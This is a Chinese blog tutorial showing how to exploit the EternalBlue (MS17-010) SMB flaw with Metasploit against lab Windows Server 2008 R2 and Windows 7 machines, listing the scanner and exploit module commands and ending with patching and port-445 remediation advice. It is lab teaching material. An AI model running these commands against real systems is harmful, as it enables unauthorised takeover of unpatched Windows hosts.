[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限

最新推荐文章于 2024-01-09 11:44:04 发布
最新推荐文章于 2024-01-09 11:44:04 发布
阅读量3.9k 收藏 122
点赞数 117
分类专栏: MSF 入门到精通 文章标签: MSF使用实例 永恒之蓝 MS17-010 主机漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/127436548
版权

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

这里简单演示一下,下一篇文章详细写利用该漏洞留存后门相关知识

一、永恒之蓝简介

永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

二、影响范围

Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server2008 R2
Windows 8.1
Windows Server 2012
Windows10
Windows Server 2012 R2
Windows Server 2016

三、环境搭建

上面版本中随便找一个搭建就行
然后关闭防火墙,开启3389端口
我这里搭建了两个版本

Windows Server 2008 R2 Datacenter 7601 Service Pack 1
Windows 7 Home Basic 7600 x64 (64-bit)

四、漏洞复现

进入msf控制台

msfconsole

在这里插入图片描述

1、Windows Server 2008 R2 Datacenter 7601 Service Pack 1

1.搜索ms17-010相关模块

search ms17-010

在这里插入图片描述

2.使用检测模块

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.13.182
run

在这里插入图片描述

3.获取权限

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.13.182
Run

在这里插入图片描述

在这里插入图片描述

2、Windows 7 Home Basic 7600 x64 (64-bit)

1.搜索ms17-010相关模块

search ms17-010

在这里插入图片描述

2.使用检测模块

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.13.183
run

在这里插入图片描述

3.获取权限

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.13.182
run

在这里插入图片描述

在这里插入图片描述

五、漏洞修复

受影响的系统版本可以参照:

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

关闭445端口。
打开防火墙,安装安全软件。
安装对应补丁。

_PowerShell
关注
  • 117
    点赞
  • 122
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 111
    评论
专栏目录
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
本课程重点讲解了如何利用Metasploit(MSF)框架进行渗透测试,通过Web传递的方式获取靶机权限。以下是详细的知识点解析: 1. **Metasploit框架**:Metasploit是一款开源的安全漏洞检测工具,它包含了大量的漏洞...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
Windows Server 2008 R2更新永恒之蓝 补丁包方法
weixin_41123024的博客
01-19 1万+
Windows Server 2008 R2更新永恒之蓝 补丁包方法
网络安全技术新手入门:利用永恒之蓝获取靶机控制权限
weixin_56154577的博客
01-09 1019
本文计较详细地介绍了利用永恒之蓝漏洞Windows系统进行攻击并且获得靶机控制权限的全过程,适合对网络安全技术感兴趣的新手小伙伴们
windows7 内部版本7601 此windows副本不是正版 ---解决方案
热门推荐
kevinx_xu的专栏
03-06 5万+
windows7桌面的右下角出现了提示:“windows7 内部版本7601 此windows副本不是正版”。 在控制面板--程序--最近更新里面看是否有最近更新的windows补丁包,发现了KB971033,同时在服务里面多了windows 激活技术更新 最开始使用了多种方法都不能解决,神K亦不可以。 后来首先卸载了KB971033,卸载后 windows 激活技术更新服务没
ms17-010永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
二、永恒之蓝漏洞
qq_59235193的博客
02-02 343
本次测试主要是利用永恒之蓝漏洞windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝漏洞利用原理。永恒之蓝Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
永恒之蓝配置Windows7
10-24
Windows7 是一种广泛使用的操作系统,但它也存在一些漏洞,例如永恒之蓝漏洞MS17-010)。本文将讲解如何使用 Kali Linux 中的 MSF-Metasploit 来利用永恒之蓝漏洞入侵 Windows7 系统。 一、准备工作 在开始之前...
永恒之蓝检查工具
10-26
永恒之蓝检查工具
永恒之蓝ms17010漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
永恒之蓝检测.zip
10-20
永恒之蓝检测.zip分享给大家,请有需要的人学习下载,后续更新各种网络安全工具,请关注后续
电脑病毒WannaCry(永恒之蓝)更新补丁蓝屏处理办法
05-16
电脑病毒WannaCry(永恒之蓝)更新补丁蓝屏处理办法,win7系统测试成功。
MSF辅助模块Auxiliary,Exploit应用,CVE-2015-1635漏洞攻防实战
最新发布
04-04
MSF辅助模块Auxiliary,Exploit应用,CVE-2015-1635漏洞攻防实战
永恒之蓝--漏洞修补
chang113的博客
06-20 1330
永恒之蓝--漏洞修补
p5_第05天:基础入门-系统及数据库等
HaHa的博客
10-30 608
小迪安全笔记p5
ms17-010漏洞复现
10-22
ms17-010漏洞是指微软Windows操作系统中的一个漏洞,黑客可以利用漏洞远程执行代码,控制受感染的计算机。下面是ms17-010漏洞的复现过程: 1. 使用nmap进行探测,发现开启445端口,该端口可能存在MS17-010漏洞。 2. 使用MSF永恒之蓝漏洞模块。 3. 使用ms17-010扫描模块,对靶机进行扫描。 4. 使用ms17-010攻击模块,对靶机进行攻击。 5. 得到靶机shell。 6. 通过shell对靶机进行控制。 需要注意的是,复现过程仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 111
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_PowerShell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值